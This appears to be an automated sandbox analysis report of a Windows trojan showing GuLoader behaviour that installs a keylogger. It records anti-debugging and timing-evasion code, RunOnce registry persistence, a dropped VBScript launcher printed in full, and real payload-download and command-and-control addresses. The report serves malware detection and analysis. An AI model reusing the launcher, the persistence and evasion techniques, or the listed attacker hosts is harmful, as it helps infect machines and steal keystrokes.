Source: C:\Users\user\Desktop\JXblq0dqPN.exe	RDTSC instruction interceptor: First address: 000000000056177F second address: 0000000000561808 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp dword ptr [ebp+0000025Bh], eax 0x00000009 mov eax, dword ptr [ebp+0000025Bh] 0x0000000f je 00007F7648A60C92h 0x00000015 test bl, bl 0x00000017 push 038032CBh 0x0000001c sub dword ptr [esp], 0FF21A02h 0x00000023 xor dword ptr [esp], 10B6888Fh 0x0000002a xor dword ptr [esp], E3389046h 0x00000031 push 2B523B77h 0x00000036 cmp dh, ch 0x00000038 xor dword ptr [esp], 6A5053ABh 0x0000003f add dword ptr [esp], CC3008CFh 0x00000046 xor dword ptr [esp], 0D3271ABh 0x0000004d push dword ptr [ebp+24h] 0x00000050 mov dword ptr [ebp+000001F4h], edx 0x00000056 mov edx, 14EDA824h 0x0000005b add edx, 104167D9h 0x00000061 xor edx, BB5692E1h 0x00000067 test al, dl 0x00000069 xor edx, 9E799D1Ch 0x0000006f push edx 0x00000070 mov edx, dword ptr [ebp+000001F4h] 0x00000076 mov dword ptr [ebp+000001BEh], esi 0x0000007c test cl, dl 0x0000007e mov esi, E709E43Eh 0x00000083 pushad 0x00000084 mov ebx, 000000A7h 0x00000089 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	RDTSC instruction interceptor: First address: 0000000000565E68 second address: 0000000000569606 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push ecx 0x00000004 mov ecx, dword ptr [ebp+000001D9h] 0x0000000a mov dword ptr [ebp+00000212h], ecx 0x00000010 mov ecx, eax 0x00000012 push ecx 0x00000013 mov ecx, dword ptr [ebp+00000212h] 0x00000019 push dword ptr [ebp+000000D0h] 0x0000001f call 00007F7648790371h 0x00000024 call 00007F764878CCF5h 0x00000029 pop ebx 0x0000002a sub ebx, 05h 0x0000002d mov dword ptr [ebp+0000014Ch], edi 0x00000033 jmp 00007F764878CDD9h 0x00000038 pushad 0x00000039 mov esi, 00000069h 0x0000003e rdtsc

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

Code function: 1_2_02261C35 rdtsc

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

Window / User API: foregroundWindowGot 513

Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 6084	Thread sleep time: -35000s >= -30000s
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5548	Thread sleep count: 250 > 30
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5548	Thread sleep time: -125000s >= -30000s
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5328	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Last function: Thread delayed

Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\ANNONCEKAMPAGNE.exe\ROGUYSoftware\Microsoft\Windows\CurrentVersion\RunOnceOTATE
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=\ANNONCEKAMPAGNE.exe\ROGUYSet W = CreateObject("WScript.Shell")
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp, JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

System information queried: ModuleInformation

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

Code function: 1_2_02261C35 rdtsc

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

Code function: 1_2_022664DD LdrInitializeThunk,

Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022685F4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02267874 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02267879 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022654A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02262D2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_02267377 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\JXblq0dqPN.exe	Code function: 1_2_022637C8 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\JXblq0dqPN.exe

Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe'

Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: logs.dat.17.dr	Binary or memory string: [ Program Manager ]
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Registry Run Keys / Startup Folder11	Process Injection12	Masquerading1	Input Capture111	Security Software Discovery721	Remote Services	Input Capture111	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder11	Virtualization/Sandbox Evasion22	LSASS Memory	Virtualization/Sandbox Evasion22	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol212	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery32	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
JXblq0dqPN.exe	36%	Virustotal		Browse
JXblq0dqPN.exe	18%	ReversingLabs	Win32.Trojan.Vebzenpak
JXblq0dqPN.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe	18%	ReversingLabs	Win32.Trojan.Vebzenpak

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
clientconfig.passport.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://101.99.94.119/WEALTH_fkWglQyCXO188.bin	1%	Virustotal		Browse
http://101.99.94.119/WEALTH_fkWglQyCXO188.bin	0%	Avira URL Cloud	safe
http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wealthyrem.ddns.net	194.5.97.128	true	true		unknown
clientconfig.passport.net	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_fkWglQyCXO188.bin	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0	JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.97.128	wealthyrem.ddns.net	Netherlands		208476	DANILENKODE	true
101.99.94.119	unknown	Malaysia		45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458740
Start date:	03.08.2021
Start time:	17:57:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 39s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	JXblq0dqPN.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Suspected Instruction Hammering Hide Perf
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@164/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 24.3% (good quality ratio 12.6%) Quality average: 33.6% Quality standard deviation: 37.7%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 23.203.80.193, 96.16.150.73, 20.82.209.183, 51.103.5.159, 52.255.188.83, 131.253.33.200, 13.107.22.200, 104.43.193.48, 23.211.6.115, 23.211.4.86, 20.82.209.104, 13.88.21.125, 173.222.108.226, 173.222.108.210, 80.67.82.211, 80.67.82.235, 20.54.110.249, 40.112.88.60, 20.82.210.154, 20.190.159.135, 20.190.159.131, 40.126.31.9, 20.190.159.133, 40.126.31.136, 40.126.31.7, 40.126.31.138, 40.126.31.5, 40.127.240.158, 51.11.168.232, 20.50.102.62 Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, www.tm.a.prd.aadg.trafficmanager.net, vip1-par02p.wns.notify.trafficmanager.net, e11290.dspg.akamaiedge.net, e13551.dscg.akamaiedge.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus15.cloudapp.net, settingsfd-geo.trafficmanager.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, msagfx.live.com-6.edgekey.net, e12564.dspb.akamaiedge.net, authgfx.msa.akadns6.net, wns.notify.trafficmanager.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:59:36	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbs
17:59:45	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
194.5.97.128	Fec9qUX4at.exe	Get hash	malicious	Browse
	LzbZ4T1iV8.exe	Get hash	malicious	Browse
	kGSHiWbgq9.exe	Get hash	malicious	Browse
	loKmeabs9V.exe	Get hash	malicious	Browse
101.99.94.119	Fec9qUX4at.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_fkWglQyCXO188.bin
	LzbZ4T1iV8.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin
	kGSHiWbgq9.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin
	loKmeabs9V.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wealthyrem.ddns.net	Fec9qUX4at.exe	Get hash	malicious	Browse	194.5.97.128
	LzbZ4T1iV8.exe	Get hash	malicious	Browse	194.5.97.128
	kGSHiWbgq9.exe	Get hash	malicious	Browse	194.5.97.128
	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	Fec9qUX4at.exe	Get hash	malicious	Browse	101.99.94.119
	LzbZ4T1iV8.exe	Get hash	malicious	Browse	101.99.94.119
	kGSHiWbgq9.exe	Get hash	malicious	Browse	101.99.94.119
	loKmeabs9V.exe	Get hash	malicious	Browse	101.99.94.119
	Audio #Ud83d#Udcde lifewire.org.HTML	Get hash	malicious	Browse	111.90.141.176
	bitratencrypt.exe	Get hash	malicious	Browse	111.90.149.108
	svchost.exe	Get hash	malicious	Browse	111.90.149.108
	eVF243bmXC.exe	Get hash	malicious	Browse	111.90.149.108
	xSnF0lxFUX.exe	Get hash	malicious	Browse	111.90.146.149
	QppmM7JmZd.exe	Get hash	malicious	Browse	111.90.146.149
	vNiyRd4GcH.exe	Get hash	malicious	Browse	111.90.146.149
	4E825059CDC8C2116FF7737EEAD0E6482A2CBF0A5790D.exe	Get hash	malicious	Browse	111.90.146.149
	SecuriteInfo.com.Trojan.Win32.Save.a.2038.exe	Get hash	malicious	Browse	101.99.94.204
	Minutes of Meeting 22062021.exe	Get hash	malicious	Browse	111.90.147.240
	naxpJ9fFZ4.exe	Get hash	malicious	Browse	111.90.149.115
	dMH1IIv1a1.exe	Get hash	malicious	Browse	111.90.149.115
	bmaphis@cardinaltek.com_16465506 AMDocAtt.HTML	Get hash	malicious	Browse	111.90.140.91
	4cDyOofgzT.xlsm	Get hash	malicious	Browse	101.99.95.230
	4cDyOofgzT.xlsm	Get hash	malicious	Browse	101.99.95.230
	341288734918_06172021.xlsm	Get hash	malicious	Browse	101.99.95.230
DANILENKODE	Global Wire Transfer.pdf.exe	Get hash	malicious	Browse	194.5.98.8
	New Order PO#42617.exe	Get hash	malicious	Browse	194.5.98.7
	KITCOFiberOptics_CompanyCertifcate.exe	Get hash	malicious	Browse	194.5.98.210
	7keerHhHvn.exe	Get hash	malicious	Browse	194.5.98.74
	Purchase.exe	Get hash	malicious	Browse	194.5.97.150
	Fec9qUX4at.exe	Get hash	malicious	Browse	194.5.97.128
	Ordonnance PL-PB39-210706,pdf.exe	Get hash	malicious	Browse	194.5.98.7
	Tzcyxxestkakhuvtmvfdserywturrfjrye.exe	Get hash	malicious	Browse	194.5.98.72
	LzbZ4T1iV8.exe	Get hash	malicious	Browse	194.5.97.128
	kGSHiWbgq9.exe	Get hash	malicious	Browse	194.5.97.128
	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128
	1niECmfIcE.exe	Get hash	malicious	Browse	194.5.97.94
	Nuzbcdoajgupgalxelbnohzzeonlplvuro.exe	Get hash	malicious	Browse	194.5.98.7
	RueoUfi1MZ.exe	Get hash	malicious	Browse	194.5.98.3
	Departamento de contadores Consejos de pago 0.exe	Get hash	malicious	Browse	194.5.98.7
	04_extracted.exe	Get hash	malicious	Browse	194.5.97.18
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	PO.exe	Get hash	malicious	Browse	194.5.98.23
	PO B4007121.exe	Get hash	malicious	Browse	194.5.98.7

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe Download File
Process:	C:\Users\user\Desktop\JXblq0dqPN.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	6.6665085666892185
Encrypted:	false
SSDEEP:	1536:mHPwUa96PZfLN0CNzYRn5ZxtBMAphNQmiPYDEZfM96nHPwU:mHIuZ1NzMBXMGh7DEhHI
MD5:	8718D75B7CAC53F13D01DDEA9B52CEE0
SHA1:	2A37A01DF74C887BB52EB2762D7D6AE0BD5E6B0B
SHA-256:	6F40242247DB00EEA1922D0C2A38337DDEA49D9DA02693679D2E4BFB19E6C088
SHA-512:	BD5EF6A34D6CE64FF42CCC54CEC25FCBA9813CB794E046C7929DA98CB11CD15F4EDBBCEA430B0859F7A3A2B34376BB9F904EB8BC50F9BC014E41A8C8397DEEB2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...\|T.Q.................@..........D........P....@.................................u"......................................TK..(....p...[..................................................................(... .......\|............................text....=.......@.................. ..`.data...\....P.......P..............@....rsrc....[...p...`...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbs Download File
Process:	C:\Users\user\Desktop\JXblq0dqPN.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	121
Entropy (8bit):	5.1295795316147235
Encrypted:	false
SSDEEP:	3:jfF+m8nhvF3mRD0nacwRE2J5xAIWQMeLAl:jFqhv9IcNwi23fWQMeC
MD5:	9EB206EED530A22BC49F0AEE8BD5A6FA
SHA1:	3D12C666021570B736B82AC424BB3483822B0899
SHA-256:	52E3A418A72C858A1305038ECDD0B12678AD468E88227A8B40C7850B4EB5F8E1
SHA-512:	FC4CFB7B03C16B0B0F7C6172CD745B05032C1F94F491E0A8AEE1193C0E6D94E2C298F2209866C3EDD6CD4603C6897C4D8F0E6038AE420C2AD3A8063E7EFE8860
Malicious:	true
Reputation:	low
Preview:	Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe")

C:\Users\user\AppData\Roaming\remcos\logs.dat Download File
Process:	C:\Users\user\Desktop\JXblq0dqPN.exe
File Type:	data
Category:	dropped
Size (bytes):	148
Entropy (8bit):	3.3910398388587963
Encrypted:	false
SSDEEP:	3:rklKlmuGlSlZPCl55JWRal2Jl+7R0DAlBG4LNQblovDl9il:IlKIuGI+b5YcIeeDAlybW/G
MD5:	0930ABF0309541D99206B336B56A2DC1
SHA1:	D82F63956D19BF7511F041004DB361FAD7734F2E
SHA-256:	3962E2DEB707D1B85418A7355AAF13270B9C0B771534393E2A5049649B47576E
SHA-512:	739D7C01496ABC283E5E24350C81B3ACBD5174813FE4F7EF795643285FF489BBBDB5211E87533ED18108B9D9FB38A2E334FA1945538266A9516B926DC5C3E538
Malicious:	false
Reputation:	low
Preview:	....[.2.0.2.1./.0.8./.0.3. .1.7.:.5.9.:.3.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.6665085666892185
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	JXblq0dqPN.exe
File size:	114688
MD5:	8718d75b7cac53f13d01ddea9b52cee0
SHA1:	2a37a01df74c887bb52eb2762d7d6ae0bd5e6b0b
SHA256:	6f40242247db00eea1922d0c2a38337ddea49d9da02693679d2e4bfb19e6c088
SHA512:	bd5ef6a34d6ce64ff42ccc54cec25fcba9813cb794e046c7929da98cb11cd15f4edbbcea430b0859f7a3a2b34376bb9f904eb8bc50f9bc014e41a8c8397deeb2
SSDEEP:	1536:mHPwUa96PZfLN0CNzYRn5ZxtBMAphNQmiPYDEZfM96nHPwU:mHIuZ1NzMBXMGh7DEhHI
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...\|T.Q.................@..........D........P....@................

File Icon


Icon Hash:	6a6a6a6a6a6a6a6a

Static PE Info

General
Entrypoint:	0x401144
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5188547C [Tue May 7 01:10:20 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5565993a5a9f2bfb76f28ab304be6bc1

Entrypoint Preview

Instruction
push 00406B3Ch
call 00007F7648944465h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi-1B674E90h], bh
sbb eax, 8587498Dh
cmpsb
inc edi
jo 00007F7648944427h
nop
sub al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [edx+00h], al
push es
push eax
add dword ptr [ecx], 55h
inc esi
dec edi
push edx
dec ebp
push ebp
inc ebp
dec esi
dec eax
inc ebp
inc esp
push ebx
add byte ptr [eax], ch
add al, 02h
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
pop es
xchg eax, ebx
inc byte ptr [eax-6Bh]
test al, CBh
xchg byte ptr [ebx-80h], al
xor dword ptr [esi+0Ah], edi
push FEA6E7D3h
wait
adc bh, dh
stc
retn 964Fh
xchg eax, ebx
jmp 00007F767C4E251Ah
sbb dword ptr [edx], edi
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec edi
pop ecx
add byte ptr [eax], al
and al, 58h
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [esi+41h], cl
push esp
push esp
dec ecx
dec esp
dec esp
inc edi
push ebx
add byte ptr [48000601h], cl
dec edi
pop ecx
inc esp
inc ebp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14b54	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x5ba2	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x7c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13dd4	0x14000	False	0.650927734375	data	7.08584386702	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0x115c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17000	0x5ba2	0x6000	False	0.545939127604	data	6.04233444538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1bcfa	0xea8	data
RT_ICON	0x1b452	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 4062978580, next used block 4061278239
RT_ICON	0x1aeea	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x18942	0x25a8	data
RT_ICON	0x1789a	0x10a8	data
RT_ICON	0x17432	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x173d8	0x5a	data
RT_VERSION	0x171e0	0x1f8	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

